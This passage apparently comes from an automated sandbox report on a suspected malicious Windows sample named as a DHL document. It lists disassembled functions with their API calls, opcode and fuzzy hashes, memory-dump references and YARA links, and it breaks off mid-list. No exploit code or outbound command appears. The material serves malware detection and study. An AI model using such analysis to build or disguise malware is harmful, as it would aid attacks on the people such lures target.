                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long
                                                                                            • String ID:
                                                                                            • API String ID: 847901565-0
                                                                                            • Opcode ID: 0d62e2eb6550314341803c30b8961074c3e23cfd221772c87c8eda7d9dc110c5
                                                                                            • Instruction ID: 1731765e1dab2754a1dcdb9eff1e835c18cc8c54edee9b99095129e9ebb0c667
                                                                                            • Opcode Fuzzy Hash: 0d62e2eb6550314341803c30b8961074c3e23cfd221772c87c8eda7d9dc110c5
                                                                                            • Instruction Fuzzy Hash: 0B115E31615615AFCB109F68CC08EB63BA5FF853A0B254728F939D72F0D7319951DB90
                                                                                            Function 008B5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 008B56BB
                                                                                            • _wcslen.LIBCMT ref: 008B56CD
                                                                                            • _wcslen.LIBCMT ref: 008B56D8
                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008B5816
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 455545452-0
                                                                                            • Opcode ID: 38b9c6eb660ba3546abea8e24c84bf3172293ecd70d48751b316ec55cff9b590
                                                                                            • Instruction ID: 9de7ecd980983234982ae3549f0e23dce005beebc75b7678233f101b6266311b
                                                                                            • Opcode Fuzzy Hash: 38b9c6eb660ba3546abea8e24c84bf3172293ecd70d48751b316ec55cff9b590
                                                                                            • Instruction Fuzzy Hash: 5911D671600608AADF209F65DC85BEE7B6CFF21764F104126F915D6281EB70C984CB64
                                                                                            Function 00851D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be0138456bcdf4c392d1f682e0b641e16bbbf7579e6e475e0ae8928804e83777
                                                                                            • Instruction ID: db2082b1d874dae082b9e6a711f30f8c32cb7518164edfc03956ccc40104283f
                                                                                            • Opcode Fuzzy Hash: be0138456bcdf4c392d1f682e0b641e16bbbf7579e6e475e0ae8928804e83777
                                                                                            • Instruction Fuzzy Hash: 5D01A2B220561A3EFA21267C6CC4F676B2CFF813BAB300325FD31E11D2DB608C485160
                                                                                            Function 00881A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00881A47
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00881A59
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00881A6F
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00881A8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: ad04c9151f2d5ebadb7af7a48a8796abf20730c3bf1419087ad3405f0253b27c
                                                                                            • Instruction ID: 9fd7d22daeacdad5c0b0fa8c03e3d91a168be60a0329cdad7b269347885ce8b1
                                                                                            • Opcode Fuzzy Hash: ad04c9151f2d5ebadb7af7a48a8796abf20730c3bf1419087ad3405f0253b27c
                                                                                            • Instruction Fuzzy Hash: C0112A3A901229FFEF109BA4C985FADBB78FB08750F200091E610B7290DB716E51DB94
                                                                                            Function 0088E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0088E1FD
                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0088E230
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0088E246
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0088E24D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 2880819207-0
                                                                                            • Opcode ID: 97c1c20d3ab79fe6a46c755c7b24660bd84f967cd210d449b536c2bd76b85b5c
                                                                                            • Instruction ID: dbae3424a967e7bf2832d14a5a313dd19f510d7c8522991f8bdd3ad44dce13a0
                                                                                            • Opcode Fuzzy Hash: 97c1c20d3ab79fe6a46c755c7b24660bd84f967cd210d449b536c2bd76b85b5c
                                                                                            • Instruction Fuzzy Hash: B711A176904258ABCB01AFA89C09AAA7BADFB45320F144265F924E3391D7B4990487A0
                                                                                            Function 0084D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,?,0084CFF9,00000000,00000004,00000000), ref: 0084D218
                                                                                            • GetLastError.KERNEL32 ref: 0084D224
                                                                                            • __dosmaperr.LIBCMT ref: 0084D22B
                                                                                            • ResumeThread.KERNEL32(00000000), ref: 0084D249
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                            • String ID:
                                                                                            • API String ID: 173952441-0
                                                                                            • Opcode ID: bc015fb32e98a0440f7f7ab1e0298b520d865946beb842908bedcf3509878cb1
                                                                                            • Instruction ID: 9ad3e2bcb0151905e8fe88898823c0817ac4089081abaec9b3304ea40cbfd1c0
                                                                                            • Opcode Fuzzy Hash: bc015fb32e98a0440f7f7ab1e0298b520d865946beb842908bedcf3509878cb1
                                                                                            • Instruction Fuzzy Hash: 2D01C03680532CBBCB115BA9DC09AAA7BA9FF81331F104229F925D21D1CBB0990186A1
                                                                                            Function 0082600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0082604C
                                                                                            • GetStockObject.GDI32(00000011), ref: 00826060
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0082606A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3970641297-0
                                                                                            • Opcode ID: 26d39531759b77d9d333f1bee6eec00df3e5518e5f18e59206786369ea384e3a
                                                                                            • Instruction ID: 044f76c538e66f8eaba2bfefdc8af2fe6dc387fa5ded41b29b9084f5e7d20536
                                                                                            • Opcode Fuzzy Hash: 26d39531759b77d9d333f1bee6eec00df3e5518e5f18e59206786369ea384e3a
                                                                                            • Instruction Fuzzy Hash: 6E116172501958FFEF124FA49C44EEA7BA9FF19364F040215FA14A6110D732DCA0EBA0
                                                                                            Function 00843B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00843B56
                                                                                              • Part of subcall function 00843AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00843AD2
                                                                                              • Part of subcall function 00843AA3: ___AdjustPointer.LIBCMT ref: 00843AED
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00843B6B
                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00843B7C
                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00843BA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                            • String ID:
                                                                                            • API String ID: 737400349-0
                                                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                            • Instruction ID: 860cd67bcc5fc6585e1d4e2c4904b6b6bce57210da7ee3a1e43f6df3d89cc469
                                                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                            • Instruction Fuzzy Hash: B001E93210014DBBDF12AE99CC46EEB7B69FF58764F044115FE48A6121C732E961DBA1
                                                                                            Function 00853073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008213C6,00000000,00000000,?,0085301A,008213C6,00000000,00000000,00000000,?,0085328B,00000006,FlsSetValue), ref: 008530A5
                                                                                            • GetLastError.KERNEL32(?,0085301A,008213C6,00000000,00000000,00000000,?,0085328B,00000006,FlsSetValue,008C2290,FlsSetValue,00000000,00000364,?,00852E46), ref: 008530B1
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0085301A,008213C6,00000000,00000000,00000000,?,0085328B,00000006,FlsSetValue,008C2290,FlsSetValue,00000000), ref: 008530BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: 7b20dc23ba3f385e532265bc2c970157633bbcb11ea9f436dec75cdcdd90adea
                                                                                            • Instruction ID: 1322da0947390009349a36dd96e96f18841a668422d916e13e1a53011e3d84f2
                                                                                            • Opcode Fuzzy Hash: 7b20dc23ba3f385e532265bc2c970157633bbcb11ea9f436dec75cdcdd90adea
                                                                                            • Instruction Fuzzy Hash: 74018432751B26ABCB214A799C849677B99FF45BE2B210724FD05E71C0D721D909C6E0
                                                                                            Function 00887464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0088747F
                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00887497
                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008874AC
                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008874CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                            • String ID:
                                                                                            • API String ID: 1352324309-0
                                                                                            • Opcode ID: 9e7bf33b500f9dc702a81be73425cfdae2fb16926efa0438f37d90f1f3ab969f
                                                                                            • Instruction ID: b7327ca3633220f036a05555d1f1da4b26d269041434b7ec46660e07fcc3dff2
                                                                                            • Opcode Fuzzy Hash: 9e7bf33b500f9dc702a81be73425cfdae2fb16926efa0438f37d90f1f3ab969f
                                                                                            • Instruction Fuzzy Hash: 9411ADB1209315ABE720AF54DC08B927FFCFF00B14F208569E656D6191D7B0E944DBA4
                                                                                            Function 0088B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0088ACD3,?,00008000), ref: 0088B0C4
                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0088ACD3,?,00008000), ref: 0088B0E9
                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0088ACD3,?,00008000), ref: 0088B0F3
                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0088ACD3,?,00008000), ref: 0088B126
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                            • String ID:
                                                                                            • API String ID: 2875609808-0
                                                                                            • Opcode ID: 051665dcca04c66cee9c1c5ce72e3ffd3111768e82dfbd6c4f32b35773cb8cb4
                                                                                            • Instruction ID: 609aff478b10aba4bec14e7e1390e32739eca56db7753879d6f9f031639ffda3
                                                                                            • Opcode Fuzzy Hash: 051665dcca04c66cee9c1c5ce72e3ffd3111768e82dfbd6c4f32b35773cb8cb4
                                                                                            • Instruction Fuzzy Hash: 7F113931C0192DE7CF00EFE8E9986EEBF78FF89711F104186D981B6281DB3056508B51
                                                                                            Function 00882DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00882DC5
                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00882DD6
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00882DDD
                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00882DE4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2710830443-0
                                                                                            • Opcode ID: 6fd7045cda70b09ac0a0288c31e4913af639515124c8ededa2dab17973dae85d
                                                                                            • Instruction ID: d361ba70ac15ac93601e966b30fb5d8830e8b7c083019c1c8ce420bcef561c84
                                                                                            • Opcode Fuzzy Hash: 6fd7045cda70b09ac0a0288c31e4913af639515124c8ededa2dab17973dae85d
                                                                                            • Instruction Fuzzy Hash: A2E0EDB25012287BD7202B669C0DEEB7F6CFB57BA1F400219B506D10919AA58941C6B0
                                                                                            Function 008B8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00839693
                                                                                              • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396A2
                                                                                              • Part of subcall function 00839639: BeginPath.GDI32(?), ref: 008396B9
                                                                                              • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396E2
                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 008B8887
                                                                                            • LineTo.GDI32(?,?,?), ref: 008B8894
                                                                                            • EndPath.GDI32(?), ref: 008B88A4
                                                                                            • StrokePath.GDI32(?), ref: 008B88B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                            • String ID:
                                                                                            • API String ID: 1539411459-0
                                                                                            • Opcode ID: 7663632c4b0b43b123d9bad2bf50b5c332040f116acbae2794b2d2b489af7072
                                                                                            • Instruction ID: 92efc95ddd744e6afab2e0e25ed55151570635d51c199f6074829b0d8b6e77e6
                                                                                            • Opcode Fuzzy Hash: 7663632c4b0b43b123d9bad2bf50b5c332040f116acbae2794b2d2b489af7072
                                                                                            • Instruction Fuzzy Hash: DEF03A36141659FBDB126F94AC0EFDA3F59BF06310F448100FA11A51E1C7B55511CFE5
                                                                                            Function 008398B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000008), ref: 008398CC
                                                                                            • SetTextColor.GDI32(?,?), ref: 008398D6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 008398E9
                                                                                            • GetStockObject.GDI32(00000005), ref: 008398F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ModeObjectStockText
                                                                                            • String ID:
                                                                                            • API String ID: 4037423528-0
                                                                                            • Opcode ID: 40cf4a48327574a5e7272b0ec94a61dfadfbb7f5a126ff54433dc8cd3673e794
                                                                                            • Instruction ID: b9d149f774861eaeaf2527dd6ae772b7d7b0e89d649a3fe498e4a51d5c65e666
                                                                                            • Opcode Fuzzy Hash: 40cf4a48327574a5e7272b0ec94a61dfadfbb7f5a126ff54433dc8cd3673e794
                                                                                            • Instruction Fuzzy Hash: 02E06D31244280AADB215B78AC09BE93F20FB52336F04C319F6FAA80E1C3718640DB20
                                                                                            Function 0088162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThread.KERNEL32 ref: 00881634
                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,008811D9), ref: 0088163B
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008811D9), ref: 00881648
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,008811D9), ref: 0088164F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                            • String ID:
                                                                                            • API String ID: 3974789173-0
                                                                                            • Opcode ID: 2977b8db703198e78700062753922ac5c5c06f9e25b41bba212767aa0d8df92c
                                                                                            • Instruction ID: 7ba43fa20a4ee167c5dc9162f8538170d7f2f7582e1c3f5935dea156faf6f958
                                                                                            • Opcode Fuzzy Hash: 2977b8db703198e78700062753922ac5c5c06f9e25b41bba212767aa0d8df92c
                                                                                            • Instruction Fuzzy Hash: 56E08631641211DBDB202FA19D0DB863B7CFF58791F184918F285C9080EA344442C760
                                                                                            Function 0087D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 0087D858
                                                                                            • GetDC.USER32(00000000), ref: 0087D862
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0087D882
                                                                                            • ReleaseDC.USER32(?), ref: 0087D8A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
